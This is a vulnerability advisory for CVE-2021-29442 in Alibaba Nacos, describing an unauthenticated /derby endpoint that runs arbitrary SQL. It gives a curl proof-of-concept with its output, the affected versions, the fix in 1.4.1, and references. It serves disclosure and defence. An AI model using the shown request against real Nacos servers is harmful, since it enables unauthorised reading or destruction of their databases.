ghsa-xv5h-v7jh-p2qh
Vulnerability from github
The ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.
For example, the following request will list the tables of the database:
❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'
{"code":200,"message":null,"data":[{"TABLENAME":"APP_CONFIGDATA_RELATION_PUBS"},{"TABLENAME":"APP_CONFIGDATA_RELATION_SUBS"},{"TABLENAME":"APP_LIST"},{"TABLENAME":"CONFIG_INFO"},{"TABLENAME":"CONFIG_INFO_AGGR"},{"TABLENAME":"CONFIG_INFO_BETA"},{"TABLENAME":"CONFIG_INFO_TAG"},{"TABLENAME":"CONFIG_TAGS_RELATION"},{"TABLENAME":"GROUP_CAPACITY"},{"TABLENAME":"HIS_CONFIG_INFO"},{"TABLENAME":"PERMISSIONS"},{"TABLENAME":"ROLES"},{"TABLENAME":"SYSALIASES"},{"TABLENAME":"SYSCHECKS"},{"TABLENAME":"SYSCOLPERMS"},{"TABLENAME":"SYSCOLUMNS"},{"TABLENAME":"SYSCONGLOMERATES"},{"TABLENAME":"SYSCONSTRAINTS"},{"TABLENAME":"SYSDEPENDS"},{"TABLENAME":"SYSDUMMY1"},{"TABLENAME":"SYSFILES"},{"TABLENAME":"SYSFOREIGNKEYS"},{"TABLENAME":"SYSKEYS"},{"TABLENAME":"SYSPERMS"},{"TABLENAME":"SYSROLES"},{"TABLENAME":"SYSROUTINEPERMS"},{"TABLENAME":"SYSSCHEMAS"},{"TABLENAME":"SYSSEQUENCES"},{"TABLENAME":"SYSSTATEMENTS"},{"TABLENAME":"SYSSTATISTICS"},{"TABLENAME":"SYSTABLEPERMS"},{"TABLENAME":"SYSTABLES"},{"TABLENAME":"SYSTRIGGERS"},{"TABLENAME":"SYSUSERS"},{"TABLENAME":"SYSVIEWS"},{"TABLENAME":"TENANT_CAPACITY"},{"TABLENAME":"TENANT_INFO"},{"TABLENAME":"USERS"}]}%
These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.alibaba.nacos:nacos-common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-29442"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-27T20:08:49Z",
"nvd_published_at": "2021-04-27T21:15:00Z",
"severity": "HIGH"
},
"details": "The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users. \n\nFor example, the following request will list the tables of the database:\n```\n\u276f curl -X GET \u0027http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st\u0027\n{\"code\":200,\"message\":null,\"data\":[{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_PUBS\"},{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_SUBS\"},{\"TABLENAME\":\"APP_LIST\"},{\"TABLENAME\":\"CONFIG_INFO\"},{\"TABLENAME\":\"CONFIG_INFO_AGGR\"},{\"TABLENAME\":\"CONFIG_INFO_BETA\"},{\"TABLENAME\":\"CONFIG_INFO_TAG\"},{\"TABLENAME\":\"CONFIG_TAGS_RELATION\"},{\"TABLENAME\":\"GROUP_CAPACITY\"},{\"TABLENAME\":\"HIS_CONFIG_INFO\"},{\"TABLENAME\":\"PERMISSIONS\"},{\"TABLENAME\":\"ROLES\"},{\"TABLENAME\":\"SYSALIASES\"},{\"TABLENAME\":\"SYSCHECKS\"},{\"TABLENAME\":\"SYSCOLPERMS\"},{\"TABLENAME\":\"SYSCOLUMNS\"},{\"TABLENAME\":\"SYSCONGLOMERATES\"},{\"TABLENAME\":\"SYSCONSTRAINTS\"},{\"TABLENAME\":\"SYSDEPENDS\"},{\"TABLENAME\":\"SYSDUMMY1\"},{\"TABLENAME\":\"SYSFILES\"},{\"TABLENAME\":\"SYSFOREIGNKEYS\"},{\"TABLENAME\":\"SYSKEYS\"},{\"TABLENAME\":\"SYSPERMS\"},{\"TABLENAME\":\"SYSROLES\"},{\"TABLENAME\":\"SYSROUTINEPERMS\"},{\"TABLENAME\":\"SYSSCHEMAS\"},{\"TABLENAME\":\"SYSSEQUENCES\"},{\"TABLENAME\":\"SYSSTATEMENTS\"},{\"TABLENAME\":\"SYSSTATISTICS\"},{\"TABLENAME\":\"SYSTABLEPERMS\"},{\"TABLENAME\":\"SYSTABLES\"},{\"TABLENAME\":\"SYSTRIGGERS\"},{\"TABLENAME\":\"SYSUSERS\"},{\"TABLENAME\":\"SYSVIEWS\"},{\"TABLENAME\":\"TENANT_CAPACITY\"},{\"TABLENAME\":\"TENANT_INFO\"},{\"TABLENAME\":\"USERS\"}]}% \n```\n\nThese endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",
"id": "GHSA-xv5h-v7jh-p2qh",
"modified": "2021-05-10T15:11:26Z",
"published": "2021-04-27T20:09:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29442"
},
{
"type": "WEB",
"url": "https://github.com/alibaba/nacos/issues/4463"
},
{
"type": "WEB",
"url": "https://github.com/alibaba/nacos/pull/4517"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-36hp-jr8h-556f"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Authentication bypass for specific endpoint"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.